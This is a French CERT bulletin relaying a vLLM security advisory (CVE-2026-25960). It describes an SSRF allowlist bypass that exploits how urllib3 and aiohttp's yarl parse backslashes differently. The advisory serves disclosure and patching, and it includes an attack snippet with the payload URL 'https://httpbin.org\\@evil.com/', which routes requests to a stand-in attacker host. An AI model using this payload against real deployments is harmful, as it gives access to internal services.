Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN275
_____________________________________________________________________

DATE                : 10/03/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running vllm (pip) versions prior
                                    to 0.17.0.

=====================================================================
https://github.com/vllm-project/vllm/security/advisories/GHSA-v359-jj2v-j536
_____________________________________________________________________

SSRF Protection Bypass in vLLM
Moderate
russellb published GHSA-v359-jj2v-j536 Mar 9, 2026

Package
vllm (pip)

Affected versions
>=0.15.1

Patched versions
0.17.0


Description

Summary

The SSRF protection fix for GHSA-qh4c-xf7m-gxfc can be bypassed in the
load_from_url_async method due to inconsistent URL parsing behavior
between the validation layer and the actual HTTP client.


Affected Component

    File: vllm/connections.py
    Function: load_from_url_async

Vulnerability Details
Root Cause

The SSRF fix uses urllib3.util.parse_url() to validate and extract the
hostname from user-provided URLs. However, load_from_url_async uses
aiohttp for making the actual HTTP requests, and aiohttp internally
uses the yarl library for URL parsing.

These two URL parsers handle backslash characters (\) differently:

Parser 	Input URL 	Parsed Host 	Parsed Path 	Behavior

urllib3.parse_url() 	https://httpbin.org\@evil.com/ 	httpbin.org
/%5C@evil.com/ 	URL-encodes \ as %5C, treats \@evil.com/ as part
of the path

yarl (via aiohttp) 	https://httpbin.org\@evil.com/ 	evil.com 
    /         Treats \ as part of userinfo (user: httpbin.org\),
the @ acts as the userinfo/host separator


Attack Scenario

# Attacker provides this URL
malicious_url = "https://httpbin.org\\@evil.com/"

# 1. Validation layer (urllib3.parse_url)
parsed = urllib3.util.parse_url(malicious_url)
# parsed.host == "httpbin.org"  ✅ Passes validation

# 2. Actual request (aiohttp with yarl)
async with aiohttp.ClientSession() as session:
    async with session.get(malicious_url) as response:
        # Request actually goes to evil.com!  ❌ Bypass!

Why This Happens

    yarl: Interprets httpbin.org\ as the userinfo component, and @ as
the userinfo/host separator, so the URL is parsed as user=httpbin.org\,
host=evil.com, path=/
    urllib3: URL-encodes the backslash as %5C, so \@evil.com/ becomes
/%5C@evil.com/ which is treated as part of the path, leaving
host=httpbin.org

This inconsistency allows an attacker to:

    Bypass the hostname allowlist check
    Access arbitrary internal/external services
    Perform full SSRF attacks


Fixes

    #34743


Severity
Moderate
5.4/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

CVE ID
CVE-2026-25960

Weaknesses
Weakness CWE-918

Credits

    @RacerZ-fighting RacerZ-fighting Reporter
    @russellb russellb Coordinator
    @DarkLight1337 DarkLight1337 Remediation reviewer
    @Isotr0py Isotr0py Other


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================